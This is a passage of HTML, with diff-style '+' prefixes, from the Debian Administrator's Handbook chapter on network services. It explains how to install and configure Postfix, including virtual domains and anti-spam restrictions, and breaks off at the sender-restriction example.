+        title="10.8. Network Diagnosis Tools" /><link
+        rel="next"
+        href="sect.http-web-server.html"
+        title="11.2. Web Server (HTTP)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/network-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-diagnosis-tools.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-web-server.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="network-services"></a>Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="network-services.html#sect.smtp-mail-server">11.1. Mail Server</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-services.html#id-1.14.4.7">11.1.1. Installing Postfix</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.configuring-virtual-domains">11.1.2. Configuring Virtual Domains</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3. Restrictions for Receiving and Sending</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.setting-up-greylisting">11.1.4. Setting Up <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">greylisting</em></span></a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#id-1.14.4.11">11.1.5. Customizing Filters Based On the Recipient</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.postfix-antivirus">11.1.6. Integrating an Antivirus</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.authenticated-smtp">11.1.7. Authenticated SMTP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.http-web-server.html">11.2. Web Server (HTTP)</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.9">11.2.1. Installing Apache</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.10">11.2.2. Configuring Virtual Hosts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.11">11.2.3. Common Directives</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.12">11.2.4. Log Analyzers</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.ftp-file-server.html">11.3. FTP File Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.nfs-file-server.html">11.4. NFS File Server</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.10">11.4.1. Securing NFS</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.11">11.4.2. NFS Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.12">11.4.3. NFS Client</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.windows-file-server-with-samba.html">11.5. Setting Up Windows Shares with Samba</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html#id-1.14.8.9">11.5.1. Samba Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html#id-1.14.8.10">11.5.2. Samba Client</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.http-ftp-proxy.html">11.6. HTTP/FTP Proxy</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.8">11.6.1. Installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.9">11.6.2. Configuring a Cache</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.10">11.6.3. Configuring a Filter</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.ldap-directory.html">11.7. LDAP Directory</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.7">11.7.1. Installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.8">11.7.2. Filling in the Directory</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.9">11.7.3. Managing Accounts with LDAP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.rtc-services.html">11.8. Real-Time Communication Services</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-dns-settings">11.8.1. DNS settings for RTC services</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.turn-server">11.8.2. TURN Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.sip-server">11.8.3. SIP Proxy Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.xmpp-server">11.8.4. XMPP Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-port-443">11.8.5. Running services on port 443</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-webrtc">11.8.6. Adding WebRTC</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Network services are the programs that users interact with directly in their daily work. They are the tip of the information system iceberg, and this chapter focuses on them; the hidden parts they rely on are the infrastructure we already described.
+	</div><div
+            class="para">
+		Many modern network services require encryption technology to operate reliably and securely, especially when used on the public Internet. X.509 Certificates (which may also be referred to as SSL Certificates or TLS Certificates) are frequently used for this purpose. A certificate for a specific domain can often be shared between more than one of the services discussed in this chapter.
+	</div><a
+            id="id-1.14.3.3"
+            class="indexterm"></a><a
+            id="id-1.14.3.4"
+            class="indexterm"></a><a
+            id="id-1.14.3.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.smtp-mail-server"></a>11.1. Mail Server</h2></div></div></div><div
+            class="para">
+			The Falcot Corp administrators selected Postfix for the electronic mail server, due to its reliability and its ease of configuration. Indeed, its design enforces that each task is implemented in a process with the minimum set of required permissions, which is a great mitigation measure against security problems.
+		</div><a
+            id="id-1.14.4.3"
+            class="indexterm"></a><a
+            id="id-1.14.4.4"
+            class="indexterm"></a><a
+            id="id-1.14.4.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> The Exim4 server</strong></p></div></div></div><a
+              id="id-1.14.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+			Debian uses Exim4 as the default email server (which is why the initial installation includes Exim4). The configuration is provided by a separate package, <span
+                class="pkg pkg">exim4-config</span>, and automatically customized based on the answers to a set of Debconf questions very similar to the questions asked by the <span
+                class="pkg pkg">postfix</span> package.
+		</div><div
+              class="para">
+			The configuration can be either in one single file (<code
+                class="filename">/etc/exim4/exim4.conf.template</code>) or split across a number of configuration snippets stored under <code
+                class="filename">/etc/exim4/conf.d/</code>. In both cases, the files are used by <code
+                class="command">update-exim4.conf</code> as templates to generate <code
+                class="filename">/var/lib/exim4/config.autogenerated</code>. The latter is the file used by Exim4. Thanks to this mechanism, values obtained through Exim's debconf configuration — which are stored in <code
+                class="filename">/etc/exim4/update-exim4.conf.conf</code> — can be injected in Exim's configuration file, even when the administrator or another package has altered the default Exim configuration.
+		</div><div
+              class="para">
+			The Exim4 configuration file syntax has its peculiarities and its learning curve; however, once these peculiarities are understood, Exim4 is a very complete and powerful email server, as evidenced by the tens of pages of documentation. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.exim.org/docs.html">http://www.exim.org/docs.html</a></div>
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.4.7"></a>11.1.1. Installing Postfix</h3></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">postfix</span> package includes the main SMTP daemon. Other packages (such as <span
+                class="pkg pkg">postfix-ldap</span> and <span
+                class="pkg pkg">postfix-pgsql</span>) add extra functionality to Postfix, including access to mapping databases. You should only install them if you know that you need them.
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.smtp"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> SMTP</strong></p></div></div></div><a
+                id="id-1.14.4.7.3.2"
+                class="indexterm"></a><a
+                id="id-1.14.4.7.3.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.7.3.4"
+                class="indexterm"></a><div
+                class="para">
+				SMTP (<span
+                  class="emphasis"><em>Simple Mail Transfer Protocol</em></span>) is the protocol used by mail servers to exchange and route emails.
+			</div></div><div
+              class="para">
+				Several Debconf questions are asked during the installation of the package. The answers allow generating a first version of the <code
+                class="filename">/etc/postfix/main.cf</code> configuration file.
+			</div><div
+              class="para">
+				The first question deals with the type of setup. Only two of the proposed answers are relevant in case of an Internet-connected server, “Internet site” and “Internet with smarthost”. The former is appropriate for a server that receives incoming email and sends outgoing email directly to its recipients, and is therefore well-adapted to the Falcot Corp case. The latter is appropriate for a server receiving incoming email normally, but that sends outgoing email through an intermediate SMTP server — the “smarthost” — rather than directly to the recipient's server. This is mostly useful for individuals with a dynamic IP address, since many email servers reject messages coming straight from such an IP address. In this case, the smarthost will usually be the ISP's SMTP server, which is always configured to accept email coming from the ISP's customers and forward it appropriately. This setup (with a smarthost) is also relevant for servers that are not permanently connected to the internet, since it avoids having to manage a queue of undeliverable messages that need to be retried later.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> ISP</strong></p></div></div></div><a
+                id="id-1.14.4.7.6.2"
+                class="indexterm"></a><div
+                class="para">
+				ISP is the acronym for “Internet Service Provider”. It covers an entity, often a commercial company, that provides Internet connections and the associated basic services (email, news and so on).
+			</div><div
+                class="para">
+			</div></div><div
+              class="para">
+				The second question deals with the full name of the machine, used to generate email addresses from a local user name; the full name of the machine ends up as the part after the at-sign (“@”). In the case of Falcot, the answer should be <code
+                class="literal">mail.falcot.com</code>. This is the only question asked by default, but the configuration it leads to is not complete enough for the needs of Falcot, which is why the administrators run <code
+                class="command">dpkg-reconfigure postfix</code> so as to be able to customize more parameters.
+			</div><div
+              class="para">
+				One of the extra questions asks for all the domain names related to this machine. The default list includes its full name as well as a few synonyms for <code
+                class="literal">localhost</code>, but the main <code
+                class="literal">falcot.com</code> domain needs to be added by hand. More generally, this question should usually be answered with all the domain names for which this machine should serve as an MX server; in other words, all the domain names for which the DNS says that this machine will accept email. This information ends up in the <code
+                class="literal">mydestination</code> variable of the main Postfix configuration file — <code
+                class="filename">/etc/postfix/main.cf</code>.
+			</div><a
+              id="id-1.14.4.7.9"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.10"
+              class="indexterm"></a><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.14.4.7.11"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/mail-server.png"
+                    alt="Role of the DNS MX record while sending a mail" /></div></div><p
+                class="title"><strong>Obrázek 11.1. Role of the DNS <span
+                    class="emphasis"><em>MX</em></span> record while sending a mail</strong></p></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>EXTRA</em></span> Querying the MX records</strong></p></div></div></div><div
+                class="para">
+				When the DNS does not have an MX record for a domain, the email server will try sending the messages to the host itself, by using the matching A record (or AAAA in IPv6).
+			</div></div><div
+              class="para">
+				In some cases, the installation can also ask what networks should be allowed to send email via the machine. In its default configuration, Postfix only accepts emails coming from the machine itself; the local network will usually be added. The Falcot Corp administrators added <code
+                class="literal">192.168.0.0/16</code> to the default answer. If the question is not asked, the relevant variable in the configuration file is <code
+                class="literal">mynetworks</code>, as seen in the example below.
+			</div><div
+              class="para">
+				Local email can also be delivered through <code
+                class="command">procmail</code>. This tool allows users to sort their incoming email according to rules stored in their <code
+                class="filename">~/.procmailrc</code> file.
+			</div><a
+              id="id-1.14.4.7.15"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.16"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.17"
+              class="indexterm"></a><div
+              class="para">
+				After this first step, the administrators got the following configuration file; it will be used as a starting point for adding some extra functionality in the next sections.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.7.19"></a><p
+                class="title"><strong>Příklad 11.1. Initial <code
+                    class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# See /usr/share/postfix/main.cf.dist for a commented, more complete version
+
+
+# Debian specific:  Specifying a file name will cause the first
+# line of that file to be used as the name.  The Debian default
+# is /etc/mailname.
+#myorigin = /etc/mailname
+
+smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
+biff = no
+
+# appending .domain is the MUA's job.
+append_dot_mydomain = no
+
+# Uncomment the next line to generate "delayed mail" warnings
+#delay_warning_time = 4h
+
+readme_directory = no
+
+# TLS parameters
+smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
+smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
+smtpd_use_tls=yes
+smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
+smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
+
+# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
+# information on enabling SSL in the smtp client.
+
+smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
+myhostname = mail.falcot.com
+alias_maps = hash:/etc/aliases
+alias_database = hash:/etc/aliases
+myorigin = /etc/mailname
+mydestination = mail.falcot.com, falcot.com, localhost.localdomain, localhost
+relayhost = 
+mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 192.168.0.0/16
+mailbox_command = procmail -a "$EXTENSION"
+mailbox_size_limit = 0
+recipient_delimiter = +
+inet_interfaces = all
+inet_protocols = all
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> <span
+                          class="emphasis"><em>Snake oil</em></span> SSL certificates</strong></p></div></div></div><div
+                class="para">
+				The <span
+                  class="emphasis"><em>snake oil</em></span> certificates, like the <span
+                  class="emphasis"><em>snake oil</em></span> “medicine” sold by unscrupulous quacks in old times, have absolutely no value: you cannot rely on them to authenticate the server since they are automatically generated self-signed certificates. However they are useful to improve the privacy of the exchanges.
+			</div><div
+                class="para">
+				In general they should only be used for testing purposes, and normal service must use real certificates; these can be generated with the procedure described in <a
+                  class="xref"
+                  href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+                    class="emphasis"><em>easy-rsa</em></span>“</a>.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.configuring-virtual-domains"></a>11.1.2. Configuring Virtual Domains</h3></div></div></div><a
+              id="id-1.14.4.8.2"
+              class="indexterm"></a><a
+              id="id-1.14.4.8.3"
+              class="indexterm"></a><div
+              class="para">
+				The mail server can receive emails addressed to other domains besides the main domain; these are then known as virtual domains. In most cases where this happens, the emails are not ultimately destined to local users. Postfix provides two interesting features for handling virtual domains.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> Virtual domains and canonical domains</strong></p></div></div></div><div
+                class="para">
+				None of the virtual domains must be referenced in the <code
+                  class="literal">mydestination</code> variable; this variable only contains the names of the “canonical” domains directly associated to the machine and its local users.
+			</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.8.6"></a>11.1.2.1. Virtual Alias Domains</h4></div></div></div><a
+                id="id-1.14.4.8.6.2"
+                class="indexterm"></a><a
+                id="id-1.14.4.8.6.3"
+                class="indexterm"></a><div
+                class="para">
+					A virtual alias domain only contains aliases, i.e. addresses that only forward emails to other addresses.
+				</div><div
+                class="para">
+					Such a domain is enabled by adding its name to the <code
+                  class="literal">virtual_alias_domains</code> variable, and referencing an address mapping file in the <code
+                  class="literal">virtual_alias_maps</code> variable.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.6.6"></a><p
+                  class="title"><strong>Příklad 11.2. Directives to add in the <code
+                      class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+virtual_alias_domains = falcotsbrand.com
+virtual_alias_maps = hash:/etc/postfix/virtual
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="filename">/etc/postfix/virtual</code> file describes a mapping with a rather straightforward syntax: each line contains two fields separated by whitespace; the first field is the alias name, the second field is a list of email addresses where it redirects. The special <code
+                  class="literal">@domain.com</code> syntax covers all remaining aliases in a domain.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.6.8"></a><p
+                  class="title"><strong>Příklad 11.3. Example <code
+                      class="filename">/etc/postfix/virtual</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+webmaster@falcotsbrand.com  jean@falcot.com
+contact@falcotsbrand.com    laure@falcot.com, sophie@falcot.com
+# The alias below is generic and covers all addresses within 
+# the falcotsbrand.com domain not otherwise covered by this file.
+# These addresses forward email to the same user name in the
+# falcot.com domain.
+@falcotsbrand.com           @falcot.com
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.8.7"></a>11.1.2.2. Virtual Mailbox Domains</h4></div></div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>CAUTION</em></span> Combined virtual domain?</strong></p></div></div></div><div
+                  class="para">
+					Postfix does not allow using the same domain in both <code
+                    class="literal">virtual_alias_domains</code> and <code
+                    class="literal">virtual_mailbox_domains</code>. However, every domain of <code
+                    class="literal">virtual_mailbox_domains</code> is implicitly included in <code
+                    class="literal">virtual_alias_domains</code>, which makes it possible to mix aliases and mailboxes within a virtual domain.
+				</div></div><a
+                id="id-1.14.4.8.7.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.8.7.4"
+                class="indexterm"></a><div
+                class="para">
+					Messages addressed to a virtual mailbox domain are stored in mailboxes not assigned to a local system user.
+				</div><div
+                class="para">
+					Enabling a virtual mailbox domain requires naming this domain in the <code
+                  class="literal">virtual_mailbox_domains</code> variable, and referencing a mailbox mapping file in <code
+                  class="literal">virtual_mailbox_maps</code>. The <code
+                  class="literal">virtual_mailbox_base</code> parameter contains the directory under which the mailboxes will be stored.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">virtual_uid_maps</code> parameter (respectively <code
+                  class="literal">virtual_gid_maps</code>) references the file containing the mapping between the email address and the system user (respectively group) that “owns” the corresponding mailbox. To get all mailboxes owned by the same owner/group, the <code
+                  class="literal">static:5000</code> syntax assigns a fixed UID/GID (of value 5000 here).
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.7.8"></a><p
+                  class="title"><strong>Příklad 11.4. Directives to add in the <code
+                      class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+virtual_mailbox_domains = falcot.org
+virtual_mailbox_maps = hash:/etc/postfix/vmailbox
+virtual_mailbox_base = /var/mail/vhosts
+</pre></div></div><div
+                class="para">
+					Again, the syntax of the <code
+                  class="filename">/etc/postfix/vmailbox</code> file is quite straightforward: two fields separated with whitespace. The first field is an email address within one of the virtual domains, and the second field is the location of the associated mailbox (relative to the directory specified in <span
+                  class="emphasis"><em>virtual_mailbox_base</em></span>). If the mailbox name ends with a slash (<code
+                  class="literal">/</code>), the emails will be stored in the <span
+                  class="emphasis"><em>maildir</em></span> format; otherwise, the traditional <span
+                  class="emphasis"><em>mbox</em></span> format will be used. The <span
+                  class="emphasis"><em>maildir</em></span> format uses a whole directory to store a mailbox, each individual message being stored in a separate file. In the <span
+                  class="emphasis"><em>mbox</em></span> format, on the other hand, the whole mailbox is stored in one file, and each line starting with “<code
+                  class="literal">From </code>” (<code
+                  class="literal">From</code> followed by a space) signals the start of a new message.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.7.10"></a><p
+                  class="title"><strong>Příklad 11.5. The <code
+                      class="filename">/etc/postfix/vmailbox</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+# Jean's email is stored as maildir, with
+# one file per email in a dedicated directory
+jean@falcot.org falcot.org/jean/
+# Sophie's email is stored in a traditional "mbox" file,
+# with all mails concatenated into one single file
+sophie@falcot.org falcot.org/sophie
+</pre></div></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.restrictions-for-receiving-and-sending"></a>11.1.3. Restrictions for Receiving and Sending</h3></div></div></div><div
+              class="para">
+				The growing number of unsolicited bulk emails (<span
+                class="emphasis"><em>spam</em></span>) requires being increasingly strict when deciding which emails a server should accept. This section presents some of the strategies included in Postfix.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> The spam problem</strong></p></div></div></div><a
+                id="id-1.14.4.9.3.2"
+                class="indexterm"></a><div
+                class="para">
+				“Spam” is a generic term used to designate all the unsolicited commercial emails (also known as UCEs) that flood our electronic mailboxes; the unscrupulous individuals sending them are known as spammers. They care little about the nuisance they cause, since sending an email costs very little, and only a very small percentage of recipients need to be attracted by the offers for the spamming operation to make more money than it costs. The process is mostly automated, and any email address made public (for instance, on a web forum, or on the archives of a mailing list, or on a blog, and so on) will be discovered by the spammers' robots, and subjected to a never-ending stream of unsolicited messages.
+			</div><div
+                class="para">
+				All system administrators try to face this nuisance with spam filters, but of course spammers keep adjusting to try to work around these filters. Some even rent networks of machines compromised by a worm from various crime syndicates. Recent statistics estimate that up to 95% of all emails circulating on the Internet are spam!
+			</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.4"></a>11.1.3.1. IP-Based Access Restrictions</h4></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">smtpd_client_restrictions</code> directive controls which machines are allowed to communicate with the email server.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.4.3"></a><p
+                  class="title"><strong>Příklad 11.6. Restrictions Based on Client Address</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_client_restrictions = permit_mynetworks,
+    warn_if_reject reject_unknown_client,
+    check_client_access hash:/etc/postfix/access_clientip,
+    reject_rbl_client sbl-xbl.spamhaus.org,
+    reject_rbl_client list.dsbl.org
+</pre></div></div><div
+                class="para">
+					When a variable contains a list of rules, as in the example above, these rules are evaluated in order, from the first to the last. Each rule can accept the message, reject it, or leave the decision to a following rule. As a consequence, order matters, and simply switching two rules can lead to a widely different behavior.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">permit_mynetworks</code> directive, used as the first rule, accepts all emails coming from a machine in the local network (as defined by the <span
+                  class="emphasis"><em>mynetworks</em></span> configuration variable).
+				</div><div
+                class="para">
+					The second directive would normally reject emails coming from machines without a completely valid DNS configuration. Such a valid configuration means that the IP address can be resolved to a name, and that this name, in turn, resolves to the IP address. This restriction is often too strict, since many email servers do not have a reverse DNS for their IP address. This explains why the Falcot administrators prepended the <code
+                  class="literal">warn_if_reject</code> modifier to the <code
+                  class="literal">reject_unknown_client</code> directive: this modifier turns the rejection into a simple warning recorded in the logs. The administrators can then keep an eye on the number of messages that would be rejected if the rule were actually enforced, and make an informed decision later if they wish to enable such enforcement.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> <span
+                            class="emphasis"><em>access</em></span> tables</strong></p></div></div></div><div
+                  class="para">
+					The restriction criteria include administrator-modifiable tables listing combinations of senders, IP addresses, and allowed or forbidden hostnames. These tables can be created from an uncompressed copy of the <code
+                    class="filename">/usr/share/doc/postfix-doc/examples/access.gz</code> file. This model is self-documented in its comments, which means each table describes its own syntax.
+				</div><div
+                  class="para">
+					The <code
+                    class="filename">/etc/postfix/access_clientip</code> table lists IP addresses and networks; <code
+                    class="filename">/etc/postfix/access_helo</code> lists domain names; <code
+                    class="filename">/etc/postfix/access_sender</code> contains sender email addresses. All these files need to be turned into hash-tables (a format optimized for fast access) after each change, with the <code
+                    class="command">postmap /etc/postfix/<em
+                      class="replaceable">file</em></code> command.
+				</div></div><div
+                class="para">
+					The third directive allows the administrator to set up a blacklist and a whitelist of email servers, stored in the <code
+                  class="filename">/etc/postfix/access_clientip</code> file. Servers in the whitelist are considered as trusted, and the emails coming from there therefore do not go through the following filtering rules.
+				</div><div
+                class="para">
+					The last two rules reject any message coming from a server listed in one of the indicated blacklists. RBL is an acronym for <span
+                  class="emphasis"><em>Remote Black List</em></span>; there are several such lists, but they all list badly configured servers that spammers use to relay their emails, as well as unexpected mail relays such as machines infected with worms or viruses.
+				</div><a
+                id="id-1.14.4.9.4.10"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.4.11"
+                class="indexterm"></a><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> White list and RBLs</strong></p></div></div></div><div
+                  class="para">
+					Blacklists sometimes include a legitimate server that has been suffering an incident. In these situations, all emails coming from one of these servers would be rejected unless the server is listed in a whitelist defined by <code
+                    class="filename">/etc/postfix/access_clientip</code>.
+				</div><div
+                  class="para">
+					Prudence therefore recommends including in the whitelist all the trusted servers from which many emails are usually received.
+				</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.5"></a>11.1.3.2. Checking the Validity of the <code
+                        class="literal">EHLO</code> or <code
+                        class="literal">HELO</code> Commands</h4></div></div></div><div
+                class="para">
+					Each SMTP exchange starts with a <code
+                  class="literal">HELO</code> (or <code
+                  class="literal">EHLO</code>) command, followed by the name of the sending email server; checking the validity of this name can be interesting.
+				</div><a
+                id="id-1.14.4.9.5.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.5.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.5.5"></a><p
+                  class="title"><strong>Příklad 11.7. Restrictions on the name announced in <code
+                      class="literal">EHLO</code></strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_helo_restrictions = permit_mynetworks,
+    reject_invalid_hostname,
+    check_helo_access hash:/etc/postfix/access_helo,
+    reject_non_fqdn_hostname,
+    warn_if_reject reject_unknown_hostname
+</pre></div></div><div
+                class="para">
+					The first <code
+                  class="literal">permit_mynetworks</code> directive allows all machines on the local network to introduce themselves freely. This is important, because some email programs do not respect this part of the SMTP protocol adequately enough, and they can introduce themselves with nonsensical names.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_invalid_hostname</code> rule rejects emails when the <code
+                  class="literal">EHLO</code> announce lists a syntactically incorrect hostname. The <code
+                  class="literal">reject_non_fqdn_hostname</code> rule rejects messages when the announced hostname is not a fully-qualified domain name (including a domain name as well as a host name). The <code
+                  class="literal">reject_unknown_hostname</code> rule rejects messages if the announced name does not exist in the DNS. Since this last rule unfortunately leads to too many rejections, the administrators turned its effect to a simple warning with the <code
+                  class="literal">warn_if_reject</code> modifier as a first step; they may decide to remove this modifier at a later stage, after auditing the results of this rule.
+				</div><div
+                class="para">
+					Using <code
+                  class="literal">permit_mynetworks</code> as the first rule has an interesting side effect: the following rules only apply to hosts outside the local network. This allows blacklisting all hosts that announce themselves as part of the <code
+                  class="literal">falcot.com</code>, for instance by adding a <code
+                  class="literal">falcot.com REJECT You are not in our network!</code> line to the <code
+                  class="filename">/etc/postfix/access_helo</code> file.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.6"></a>11.1.3.3. Accepting or Refusing Based on the Announced Sender</h4></div></div></div><div
+                class="para">
+					Every message has a sender, announced by the <code
+                  class="literal">MAIL FROM</code> command of the SMTP protocol; again, this information can be validated in several different ways.
+				</div><a
+                id="id-1.14.4.9.6.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.6.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.6.5"></a><p
+                  class="title"><strong>Příklad 11.8. Sender checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_sender_restrictions = 
